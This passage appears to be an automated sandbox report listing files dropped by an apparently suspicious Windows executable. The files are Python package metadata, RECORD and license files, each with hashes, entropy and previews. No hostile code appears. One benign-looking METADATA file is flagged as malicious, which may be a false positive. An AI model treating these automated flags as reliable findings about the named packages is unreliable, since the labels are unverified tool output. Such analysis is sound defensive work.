                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):15006
                                                                                                                                                                                                                              Entropy (8bit):4.800156894367144
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:S037UxjwUbQd1Ak++k59jg8dXRNInXF2IOxcme+kQBd9Clb:d37U1LbQd1Z+3e8dhwXFacb+kQjQb
                                                                                                                                                                                                                              MD5:542BA4FBC993C39A0BC952BE72E8717F
                                                                                                                                                                                                                              SHA1:4310DB58F98C12B23286E5FA37F0E27ABEFB6A4A
                                                                                                                                                                                                                              SHA-256:3800D9B91DCEEA2065A6ED6279383362E97AC38B8E56B9343F404EE531860099
                                                                                                                                                                                                                              SHA-512:E3672EA056E5F2EFD3685C98DC0CF47E9A44F5A84DC457FC8AB31CD6DE09559C6E566D2D00F5B3CE55511E81A050DBB0DED6CF941916A6FF1019392FD96E1636
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: autocommand.Version: 2.2.2.Summary: A library to create a command-line program from a function.Home-page: https://github.com/Lucretiel/autocommand.Author: Nathan West.License: LGPLv3.Project-URL: Homepage, https://github.com/Lucretiel/autocommand.Project-URL: Bug Tracker, https://github.com/Lucretiel/autocommand/issues.Platform: any.Classifier: Development Status :: 6 - Mature.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3).Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Topic :: Software Development.Classifier: Topic :: Software Development :: Libraries.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Requires-Python: >=3.7.Description-Content-Type: text/markdown.License-File: LICENSE..[![PyPI version](https://badge.fury.io/py/autocommand.svg)](
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1308
                                                                                                                                                                                                                              Entropy (8bit):5.721750099226425
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:kn/2zDcMvX4owkE+RlpGUttyvUMDtuH5p4D127cyOMT34:knuXNv4LkEMl0UWMF5p45AcuT34
                                                                                                                                                                                                                              MD5:52BF4937018B88B9D28ED98A76B5E2AC
                                                                                                                                                                                                                              SHA1:C8D5B732C154A2D4D501454647FAFEB356B93C4E
                                                                                                                                                                                                                              SHA-256:822BBA66B41526FA547186B80221F85DA50D652BEE5493DBFE5D14085112F0C3
                                                                                                                                                                                                                              SHA-512:30E4DEFE09FB8907166682F9A33E0F7CC0203B65113155BBEC6548A1EADF7250882AF295FF2551803703274F9F387E00439D95CBBCB63D2E04E371B94556B3EE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:autocommand-2.2.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..autocommand-2.2.2.dist-info/LICENSE,sha256=reeNBJgtaZctREqOFKlPh6IzTdOFXMgDSOqOJAqg3y0,7634..autocommand-2.2.2.dist-info/METADATA,sha256=OADZuR3O6iBlpu1ieTgzYul6w4uOVrk0P0BO5TGGAJk,15006..autocommand-2.2.2.dist-info/RECORD,,..autocommand-2.2.2.dist-info/WHEEL,sha256=2wepM1nk4DS4eFpYrW1TTqPcoGNfHhhO_i5m4cOimbo,92..autocommand-2.2.2.dist-info/top_level.txt,sha256=AzfhgKKS8EdAwWUTSF8mgeVQbXOY9kokHB6kSqwwqu0,12..autocommand/__init__.py,sha256=zko5Rnvolvb-UXjCx_2ArPTGBWwUK5QY4LIQIKYR7As,1037..autocommand/__pycache__/__init__.cpython-312.pyc,,..autocommand/__pycache__/autoasync.cpython-312.pyc,,..autocommand/__pycache__/autocommand.cpython-312.pyc,,..autocommand/__pycache__/automain.cpython-312.pyc,,..autocommand/__pycache__/autoparse.cpython-312.pyc,,..autocommand/__pycache__/errors.cpython-312.pyc,,..autocommand/autoasync.py,sha256=AMdyrxNS4pqWJfP_xuoOcImOHWD-qT7x06wmKN1Vp-U,5680..autocommand/autoco
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.842566724466667
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlViJR4KgP+tPCCfA5S:RtBMwlVifAWBBf
                                                                                                                                                                                                                              MD5:88F09A0EC874FD86ABCB9BC4E265B874
                                                                                                                                                                                                                              SHA1:786AB44FFD2F5C632B4DC5C1BF4AA2E91E579A05
                                                                                                                                                                                                                              SHA-256:DB07A93359E4E034B8785A58AD6D534EA3DCA0635F1E184EFE2E66E1C3A299BA
                                                                                                                                                                                                                              SHA-512:7FFEF1EC782D590D2879294C2895A5A8064ECD5FE7243CF602FCCE66A8A715F64436F17CE96070B613123847EE0C18AB0AA5BC87DB13E98A792DC07DD95E4BAB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.38.4).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12
                                                                                                                                                                                                                              Entropy (8bit):3.084962500721156
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:5EEln:aM
                                                                                                                                                                                                                              MD5:C3FBD7931840D987F261BEBA8C77C4D2
                                                                                                                                                                                                                              SHA1:F7EE740BCB5C39966173CC377817A157D55844F7
                                                                                                                                                                                                                              SHA-256:0337E180A292F04740C16513485F2681E5506D7398F64A241C1EA44AAC30AAED
                                                                                                                                                                                                                              SHA-512:E1FA2DE0EE416AE68C57A0173C82D42A8F24DDD1E5143A1B76A3743B5EC3DDF11FB3950F27469D3D8FCAC4958CE267A7321D2F888671EDD7C2E95D0F3F8F7455
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:autocommand.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                              Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                              MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                              SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                              SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                              SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2020
                                                                                                                                                                                                                              Entropy (8bit):5.0469065437932175
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:DfdqaaC3P1xe9okGw1w8wQwywbM0kvsJib0ts++kv0gMzvy0htC+heU01:DfdqaaC/12G2bHZokO+/36
                                                                                                                                                                                                                              MD5:18B352E2051962B9F65C33BC651426BF
                                                                                                                                                                                                                              SHA1:3DD8D93CF7695D1C9D7574751AB5B0DEE5DD7F9A
                                                                                                                                                                                                                              SHA-256:8215C54EAD77D9DC5A108A25C6BDC72B5999AA6F62C9499A440359412AFA5A51
                                                                                                                                                                                                                              SHA-512:D966BC2899079C0D9AC763C96EA59A550E00A54BDCEEB6D96B0A8CAA9F6A1C408E7E3946915432978EDE9EDF669EEC68035A55B094B69671A28428458760D99E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: backports.tarfile.Version: 1.2.0.Summary: Backport of CPython tarfile module.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Homepage, https://github.com/jaraco/backports.tarfile.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Provides-Extra: testing.Requires-Dist: pytest !=8.1.*,>=6 ; extra == 'testing'.Requires-Dist: pytest-checkdocs >=2.4 ; extra == 'testing'.Requires-Dist: pytest-cov ; extra == 'testing
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1360
                                                                                                                                                                                                                              Entropy (8bit):5.753738299642538
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:U6rn/2zDJ6rvbqfuG6rJnB6rU6rEsJYB6rXamx6rlCHmTKjaQliwxJlp5DQljQls:NnuXIzUurJwN5JjfAlqYK9liSlp5DQlP
                                                                                                                                                                                                                              MD5:CF347AE8E31132435B127226F358F8CD
                                                                                                                                                                                                                              SHA1:2C857B300638FF291651234BBB2C077BEEF494E4
                                                                                                                                                                                                                              SHA-256:258A1F1C849E1175069A55A5D6CE357AFDD04E34CD5DE27093E4ACEC7A9D2CE1
                                                                                                                                                                                                                              SHA-512:2A46C7FDFA2F9883BB1D761646B33BE9CE7B07280A5BF38992C1C84AB0449944EB0CAF34620CCC82DDBBC193F0D54AE67797D97863F70CA0C24EE55A3B401F9C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:backports.tarfile-1.2.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..backports.tarfile-1.2.0.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..backports.tarfile-1.2.0.dist-info/METADATA,sha256=ghXFTq132dxaEIolxr3HK1mZqm9iyUmaRANZQSr6WlE,2020..backports.tarfile-1.2.0.dist-info/RECORD,,..backports.tarfile-1.2.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..backports.tarfile-1.2.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..backports.tarfile-1.2.0.dist-info/top_level.txt,sha256=cGjaLMOoBR1FK0ApojtzWVmViTtJ7JGIK_HwXiEsvtU,10..backports/__init__.py,sha256=iOEMwnlORWezdO8-2vxBIPSR37D7JGjluZ8f55vzxls,81..backports/__pycache__/__init__.cpython-312.pyc,,..backports/tarfile/__init__.py,sha256=Pwf2qUIfB0SolJPCKcx3vz3UEu_aids4g4sAfxy94qg,108491..backports/tarfile/__main__.py,sha256=Yw2oGT1afrz2eBskzdPYL8ReB_3liApmhFkN2EbDmc4,59..backports/tarfile/__pycache__/__init__.cpython-312.pyc,,..back
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                              MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                              SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                              SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                              SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10
                                                                                                                                                                                                                              Entropy (8bit):3.321928094887362
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:21v:ev
                                                                                                                                                                                                                              MD5:9BA458821AD258B6EF62B47E91302982
                                                                                                                                                                                                                              SHA1:9EDB9E6BA5C4001CE2FCCF328739292404EA9604
                                                                                                                                                                                                                              SHA-256:7068DA2CC3A8051D452B4029A23B73595995893B49EC91882BF1F05E212CBED5
                                                                                                                                                                                                                              SHA-512:3A296E5DADD5B406330BA088BFED33BE6960F8FF42DB6651E185FF14F2272FC819EF520D1A15BC40DA4E20B9CA0E5D79170EDF33F3D50937C7FBEDB338CAC730
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:backports.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11358
                                                                                                                                                                                                                              Entropy (8bit):4.4267168336581415
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
                                                                                                                                                                                                                              MD5:3B83EF96387F14655FC854DDC3C6BD57
                                                                                                                                                                                                                              SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
                                                                                                                                                                                                                              SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
                                                                                                                                                                                                                              SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4648
                                                                                                                                                                                                                              Entropy (8bit):5.006900644756252
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Dx2ZSaCSmS8R902Vpnu386eLQ9Ac+fFZpDN00x2jZ2SBXZJSwTE:9Smzf02Vpnu386mQ9B+TP0vJHJSwTE
                                                                                                                                                                                                                              MD5:98ABEAACC0E0E4FC385DFF67B607071A
                                                                                                                                                                                                                              SHA1:E8C830D8B0942300C7C87B3B8FD15EA1396E07BD
                                                                                                                                                                                                                              SHA-256:6A7B90EFFEE1E09D5B484CDF7232016A43E2D9CC9543BCBB8E494B1EC05E1F59
                                                                                                                                                                                                                              SHA-512:F1D59046FFA5B0083A5259CEB03219CCDB8CC6AAC6247250CBD83E70F080784391FCC303F7630E1AD40E5CCF5041A57CB9B68ADEFEC1EBC6C31FCF7FFC65E9B7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: importlib_metadata.Version: 8.0.0.Summary: Read metadata from Python packages.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/python/importlib_metadata.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: zipp >=0.5.Requires-Dist: typing-extensions >=3.6.4 ; python_version < "3.8".Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'doc'.Provides-Extra: perf.Requires-D
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2518
                                                                                                                                                                                                                              Entropy (8bit):5.6307766747793275
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:UnuXTg06U5J/Vw9l/gfNX7/XzBk9pvJq/fwJOfYrBfnJ/V0XJnzN/3WJV:bXzP/EgdzzBkDJsoIYrBfJ/CXNz9qV
                                                                                                                                                                                                                              MD5:EB513CAFA5226DDA7D54AFDCC9AD8A74
                                                                                                                                                                                                                              SHA1:B394C7AEC158350BAF676AE3197BEF4D7158B31C
                                                                                                                                                                                                                              SHA-256:0D8D3C6EEB9EBBE86CAC7D60861552433C329DA9EA51248B61D02BE2E5E64030
                                                                                                                                                                                                                              SHA-512:A0017CFAFF47FDA6067E3C31775FACEE4728C3220C2D4BD70DEF328BD20AA71A343E39DA15CD6B406F62311894C518DFCF5C8A4AE6F853946F26A4B4E767924E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:importlib_metadata-8.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_metadata-8.0.0.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_metadata-8.0.0.dist-info/METADATA,sha256=anuQ7_7h4J1bSEzfcjIBakPi2cyVQ7y7jklLHsBeH1k,4648..importlib_metadata-8.0.0.dist-info/RECORD,,..importlib_metadata-8.0.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..importlib_metadata-8.0.0.dist-info/WHEEL,sha256=mguMlWGMX-VHnMpKOjjQidIo1ssRlCFu4a4mBpz1s2M,91..importlib_metadata-8.0.0.dist-info/top_level.txt,sha256=CO3fD9yylANiXkrMo4qHLV_mqXL2sC5JFKgt1yWAT-A,19..importlib_metadata/__init__.py,sha256=tZNB-23h8Bixi9uCrQqj9Yf0aeC--Josdy3IZRIQeB0,33798..importlib_metadata/__pycache__/__init__.cpython-312.pyc,,..importlib_metadata/__pycache__/_adapters.cpython-312.pyc,,..importlib_metadata/__pycache__/_collections.cpython-312.pyc,,..importlib_metadata/__pycache__/_compat.cpython-312.pyc,,..importlib_metadata/__pycac
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):91
                                                                                                                                                                                                                              Entropy (8bit):4.687870576189661
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeXMRYFAVLMvhRRP+tPCCfA5S:RtC1VLMvhjWBBf
                                                                                                                                                                                                                              MD5:7D09837492494019EA51F4E97823D79F
                                                                                                                                                                                                                              SHA1:7829B4324BB542799494131A270EC3BDAD4DEDEF
                                                                                                                                                                                                                              SHA-256:9A0B8C95618C5FE5479CCA4A3A38D089D228D6CB1194216EE1AE26069CF5B363
                                                                                                                                                                                                                              SHA-512:A0063220ECDD22C3E735ACFF6DE559ACF3AC4C37B81D37633975A22A28B026F1935CD1957C0FF7D2ECC8B7F83F250310795EECC5273B893FFAB115098F7B9C38
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: setuptools (70.1.1).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):19
                                                                                                                                                                                                                              Entropy (8bit):3.536886723742169
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:JSej0EBERG:50o4G
                                                                                                                                                                                                                              MD5:A24465F7850BA59507BF86D89165525C
                                                                                                                                                                                                                              SHA1:4E61F9264DE74783B5924249BCFE1B06F178B9AD
                                                                                                                                                                                                                              SHA-256:08EDDF0FDCB29403625E4ACCA38A872D5FE6A972F6B02E4914A82DD725804FE0
                                                                                                                                                                                                                              SHA-512:ECF1F6B777970F5257BDDD353305447083008CEBD8E5A27C3D1DA9C7BDC3F9BF3ABD6881265906D6D5E11992653185C04A522F4DB5655FF75EEDB766F93D5D48
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:importlib_metadata.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11358
                                                                                                                                                                                                                              Entropy (8bit):4.4267168336581415
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
                                                                                                                                                                                                                              MD5:3B83EF96387F14655FC854DDC3C6BD57
                                                                                                                                                                                                                              SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
                                                                                                                                                                                                                              SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
                                                                                                                                                                                                                              SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
